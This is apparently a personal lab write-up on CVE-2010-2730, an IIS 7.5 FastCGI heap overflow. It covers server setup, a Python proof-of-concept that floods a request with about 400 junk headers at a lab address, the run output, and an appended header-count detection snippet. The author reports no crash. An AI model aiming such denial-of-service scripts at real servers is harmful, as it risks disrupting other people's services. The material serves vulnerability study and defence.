Check Point describes the vulnerability as follows:
"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."
Configuring FastCGI for IIS 7.5
Browse to Control Panel -> Programs and Features, click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and unchecking all the other checkboxes given below.
Install Administrator pack for IIS 7.5. After installing the pack, click Start and type IIS; you will see Internet Information Services (IIS Manager). Clicking on it will take you to the window below.
Configure FastCGI as shown below
If you feel the configuration didn't go well, you can configure and verify it using the CLI.
appcmd.exe is found at
%windir%\system32\inetsrv\
If the FastCGI installation is successful, accessing
http://localhost/phpinfo.cgi
should show the page below. I created the page phpinfo.php under
C:\Inetpub\wwwroot\
Make sure the directory has proper permissions.
Proof of Concept
#!/usr/bin/python
import os, sys
import urllib2

def main(all_args):
    print "in main"
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
        sys.exit();
    headers = {"Host":all_args[1],
               "Accept": "text/html,application/xhtml+xml,application/xml",
               "Accept-Language": "en-us",
               "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
               "Keep-Alive": "115",
               "Connection": "keep-alive"}
    for k,v in headers.items():
        print (k, v)
    #create junk headers
    print "Creating junk Request Headers"
    for i in range(1,400):
        junk_header = "My-Name" + str(i)
        value = "Praveen Darshanam" + str(i)
        headers.update({junk_header: value})
    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(response.read()))

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)
    main(sys.argv)
Usage
./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port
praveend@praveend-VirtualBox:~$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80
sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '192.168.56.110')
Creating junk Request Headers
url: http://192.168.56.110:80/phpinfo.php
Response Length =119639
Exploit Traffic
I didn't see any crash after sending multiple fake headers; I'm not sure if I interpreted the vulnerability in the correct manner.
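A defender-side check for the condition the advisory describes (an unexpected number of request headers), added here as an example and not part of the original post: it counts the header fields in a raw HTTP/1.x request and flags requests above a limit. The function names, the 100-field limit and the sample requests (constructed from the header names shown above) are assumptions for illustration; the code is Python 3, unlike the Python 2 script above.

```python
MAX_HEADERS = 100  # assumed limit; tune to what legitimate clients really send


def parse_header_fields(raw):
    """Return [(name, value)] from the header block of one raw HTTP/1.x request."""
    head, _, _ = raw.partition(b"\r\n\r\n")      # ignore any body
    fields = []
    for line in head.split(b"\r\n")[1:]:          # [1:] skips the request line
        if line[:1] in (b" ", b"\t") and fields:
            # obs-fold continuation: extends the previous field, not a new one
            name, value = fields[-1]
            fields[-1] = (name, value + b" " + line.strip())
            continue
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError("malformed header line: %r" % line[:40])
        fields.append((name.strip().lower(), value.strip()))
    return fields


def inspect_request(raw, max_headers=MAX_HEADERS):
    """Summarise the header count and whether it exceeds the limit."""
    fields = parse_header_fields(raw)
    return {
        "header_count": len(fields),
        "distinct_names": len({name for name, _ in fields}),
        "over_limit": len(fields) > max_headers,
    }


def build_sample(extra):
    """Constructed sample: the six base headers plus `extra` numbered ones."""
    base = [("Host", "192.168.56.110"),
            ("Accept", "text/html,application/xhtml+xml,application/xml"),
            ("Accept-Language", "en-us"),
            ("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"),
            ("Keep-Alive", "115"),
            ("Connection", "keep-alive")]
    junk = [("My-Name%d" % i, "Praveen Darshanam%d" % i)
            for i in range(1, extra + 1)]
    lines = ["GET /phpinfo.php HTTP/1.1"] + ["%s: %s" % kv for kv in base + junk]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


if __name__ == "__main__":
    for label, extra in (("baseline", 0), ("399 extra headers", 399)):
        print(label, inspect_request(build_sample(extra)))
```

The same count can be applied to requests reassembled from a packet capture or a reverse-proxy log to see whether oversized header sets are reaching the server.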
References
https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx
http://www.iis.net/configreference/system.webserver/fastcgi
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730
http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html
http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html
https://technet.microsoft.com/library/security/ms10-065